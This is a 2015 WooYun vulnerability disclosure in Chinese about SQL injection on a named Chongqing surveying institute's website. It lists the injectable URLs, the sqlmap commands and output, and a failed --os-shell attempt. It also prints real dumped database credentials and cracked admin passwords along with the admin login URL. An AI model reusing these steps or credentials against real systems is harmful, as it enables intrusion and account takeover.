当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105442

漏洞标题:重庆市勘测院SQL注射及敏感文件泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 千斤拨四两

提交时间:2015-04-03 16:14

修复时间:2015-05-23 08:26

公开时间:2015-05-23 08:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-08: 厂商已经确认,细节仅向厂商公开
2015-04-18: 细节向核心白帽子及相关领域专家公开
2015-04-28: 细节向普通白帽子公开
2015-05-08: 细节向实习白帽子公开
2015-05-23: 细节向公众公开

简要描述:

网站多处注射点和敏感文件暴漏web服务器信息,版本类型路径!

详细说明:

注射点,WVS直接扫除大量的折射点。

http://www.cqkcy.com/product_content.php?cid=295&id=2553


http://www.cqkcy.com/test.php


爆出服务器环境,apache服务器,mysql数据库,网站的绝对路径直接也可以得到。

s.png


既然有了注入点直接丢到sqlmap里跑数据。命令执行查看数据库权限
--current-db:
current user: 'root@localhost'

t.png


既然是root的权限有知道网站的绝对路径或许能直接getshell。
写shell前提条件 (1.必须是root权限 2.必须知道网站路径 3.GPC设置为off)
现在知道前两点都具备了,尝试写shell。
--os-shell执行。
结果没有写进去那应该就是GPC设置成了ON。
既然是root是可以爆出数据库的虽有用户的密码。

database management system users password hashes:                              
[*] cqkcy [1]:
    password hash: *C7515F7E00546FA18862A69EC1264DAE678980EA
    clear-text password: cqkcy
[*] geoking4 [1]:
    password hash: *23F6C373FADD3E14EFCB9F296C192EFE779E1DF2
    clear-text password: geoking4
[*] root [1]:
    password hash: *C7515F7E00546FA18862A69EC1264DAE678980EA  
    clear-text password: cqkcy


sqlmap直接将md5也直接跑了出来。

漏洞证明:

直接贴出数据库的信息吧!

available databases [10]:
[*] cqkcy
[*] information_schema
[*] jbtyzhsq
[*] mysql
[*] performance_schema
[*] sakila
[*] smws
[*] smws42
[*] test
[*] world
current database:    'cqkcy'


w.png


Database: cqkcy
[15 tables]
+-----------------+
| adlink_area     |
| adlink_item     |
| config          |
| content         |
| content_column  |
| focus           |
| focus_column    |
| guestbook       |
| guestbook2      |
| job             |
| job_candidate   |
| job_recruitment |
| jx              |
| manager         |
| myorder         |


e.png


Database: cqkcy
Table: manager
[13 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| flag     | text             |
| id       | int(10) unsigned |
| intro    | text             |
| lastdate | datetime         |
| lastip   | varchar(45)      |
| memo     | text             |
| name     | varchar(45)      |
| password | varchar(255)     |
| realname | varchar(45)      |
| state    | int(11)          |
| thisdate | datetime         |
| thisip   | varchar(45)      |
| type     | int(11)          |
+----------+------------------+


r.png


Database: cqkcy
Table: manager
[5 entries]
+---------+----------------------------------------+
| name    | password                               |
+---------+----------------------------------------+
| admin   | c4ca4238a0b923820dcc509a6f75849b (1)   |
| dingwei | 202cb962ac59075b964b07152d234b70 (123) |
| wyl     | c6f057b86584942e415435ffb1fa93d4 (000) |
| XHL     | c6f057b86584942e415435ffb1fa93d4 (000) |
| YJ      | 202cb962ac59075b964b07152d234b70 (123) |
+---------+----------------------------------------+


t.png


可有账号密码,就是找后台,google hack,工具,之后找到了后台。

http://www.cqkcy.com/m/manager/login.php


1123.png


1223.jpg


修复方案:

过滤,test.php可删除!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-08 08:24

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置。

最新状态:

暂无